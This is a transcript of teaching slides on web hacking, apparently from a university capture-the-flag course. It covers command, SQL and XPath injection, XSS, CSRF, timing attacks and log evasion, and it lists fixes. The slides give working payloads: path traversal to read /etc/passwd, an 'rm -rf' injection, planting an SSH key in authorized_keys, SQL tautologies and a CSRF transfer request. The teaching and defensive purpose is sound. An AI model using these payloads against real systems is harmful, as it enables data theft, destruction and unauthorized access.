Mike Gerschefske
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Mike Gerschefske
Hacking is illegal (most of the time) Understand the laws Port Scanning can be considered
illegal Post 9/11 can be act of terrorism
DMCA Exceptions Educational Learning (Institution)
Who cares about web hacking? The days of buffer overflows and root
boxes are nearing an end… Non executing stacks People patching their systems
Everything is turning into a web system
Power of Google
Google knows all SSN/Credit Card, backend sql http://johnny.ihackstuff.com/ghdb.php
intitle:snc-rz30 inurl:home/ Robots.txt
Don’t put secrets in here
Power of the web browser
Is capable of HTTP GET/POST Capable of sending any kind of GET/POST Doesn’t have to run client side code (ie
javascript) Can send anything it wants to
Can be Bad: url:
http://somesite/index.php?section=Admin Vertical Escalation
Bad Code = Bad Security
You are not able to control client end: Cookies
Do not put User Level (admin, user, etc.) Vertical Escalation
Do not put user id Horizontal Escalation
Posts Gets Session IDs All Data
The Infamous Museum Example!Command Injection Tools
Vi Putty Puttygen firefox
Museum Example Code from two [n] years ago: 1 #!/usr/bin/perl …
7 $first = param('first'); 8 $last = param('last'); 9 $password = param('password'); 10 … 25 if (($first eq "") || ($last eq "") || (! $password eq
"unbreakable")) { 26 print "<p>Could not understand or wrong
password!!</p>"; 27 } 28 else { 29 system "cat ./museum_ideas/${first}.${last}"; …
Some Good Combinations
Dump the password file:First Name: .
Last Name : /../../../../etc/passwd
Password : unbreakable
Delete the whole directory:First Name: NOTEMPTY Last Name : & rm -rf
/home/museum/public_html/cgi_bin/museum_ideas
Password : unbreakable
SSH RSA Example
Putty GEN & mkdir /home/museum/.ssh & echo “ssh-rsa PRIV-KEY“ >
/home/museum/.ssh/authorized_keys2 NO SPACES!
Museum on Athena!
An Example write-up: http://athena.uccs.edu/ictf/index.php/
Museum
Command Injection
This is basic idea of command injection
Security through obscurity sometimes works
Some people are very diligent
SQL Injections
We can send commands, why not sql?
What is SQL?
What can we do with SQL? Get any data we want (that the user has
access to) Delete all the data the user has access to
If user is root, dump database If user is root, can upload and execute java/c from
database and root box
Another Example
http://128.198.60.73/~contribute/cgi-bin/history.py
query = "SELECT * FROM contributors where name=\"%s\" ;" % ( form.getvalue("name") )
" or "1" = "1
How to protect against it? Check parameters
Not really…
Need to do SQL parameterization when at all possible Mark strings as strings, ints as ints
SELECT * WHERE name = @
Why doesn’t checking params work? If you’re really smart it will, but if you
don’t understand the problem it wont This is a very difficult problem to understand
Example: http://viva/ictf/index.php/SQL_Injection
The problem is the ‘ (apostrophe) is a special character To fix we just find and replace all
apostrophe’s with two ‘’ as that’s how we insert apostrophes in a string NO!
Second Level SQL Injection The problem actually isn’t solved, just
more complicated
Take:
Username = ' OR 'a' = 'a‘
SELECT * FROM Users WHERE UserName = ''' OR ''a'' = ''a''
Goes in fine but coming out… Get username from DB and put in
var Var contains SQL We TRUST DB to give us good data Create another SQL Query and the
second one is now vulnerable
SELECT content FROM database WHERE username = VUNSQL
XSS – Cross Site Scripting Malicious injection of JavaScript Cookie Hi-jacking MySpace – Replicate itself, add friends
Samy – oh wait, some CSRF too (oops) http://web.archive.org/web/20060208182348/namb.la/popular/tech.html
<script> document.write(“<img
src=http://site.com/a.jpg”);</script>
CSRF – XS Request Forgery Alice Logs into www.bank.com on tab
A Alice goes to www.google.com which
has advertisement that contains JS Code on Add
<script>doc.write(“<img
src=www.bank.com/transfer?DEST=Mallory&Ammount=1000>”);</script>
Xpath Injection
//user[name/test() = ‘’ or 1=1 or ‘’ and password/text() = ‘junk’]
Used with: XML RPC SOAP/WSDL
Click Jacking…
…
IDS Will Find You
SQL/Command Injection is very easy to detect
IDS poor at packet fragmentation with timing attacks
Profiling
Need to know what you’re attacking Can search for exploits
HEAD / HTTP/1.0 Example Everyone’s a little different
Nmap is a good profiler Nessus will profile too
Tools
Add N Edit Cookie – Mozilla Firefox extension
Wget TamperData – FireFox Modify Headers - FireFox Curl Netcat/Telnet
Proxies Paros Proxy – Free Fiddler – Microsoft, Free Spike – Free
Timing Attacks
Breaking Authentication Username and password wrong may
take x time while username doesn’t exist takes y time
Successful timing attacks against encryption
Never ever ever roll ur own Encryption Microsoft tried this – FAIL
Tea Party! ROT13 Base64 MD5
ASP.NET Exploit
Debugging (source code) only available to localhost
Bypass this check by sending the following: GET http://localhost/bleh.asp?a=j HTTP/1.0
Check’s server name variable rather then remote address
Mod_security
http://www.modsecurity.org/
Replay Attacks
Socrebot deletes flag Scorebot adds flag
Since the scorebot goes to everyone we have the delete and add sequence
Can potentially replay same delete sequence across all enemy servers
Log Evasion
Many logs only log ~4K of URL Usually don’t log POST contents
Prevents DOS from filling up logs
If payload at the end of 4k, wont log malicious payload
http://somewhre.com/page.asp?foo=....&payload=MYPAYLOAD Application ignores foo parameter Log shows up as GET /page.asp …
Not just IIS, Sun One App Server
OWASP – Top 10!A1 - Cross Site Scripting (XSS)
A2 - Injection Flaws
A3 - Malicious File Execution
A4 - Insecure Direct Object Reference A5 - Cross Site Request Forgery (CSRF) A6 - Information Leakage and Improper Error Handling A7 - Broken Authentication and Session Management A8 - Insecure Cryptographic Storage A9 - Insecure Communications A10 - Failure to Restrict URL Access
Related Documents
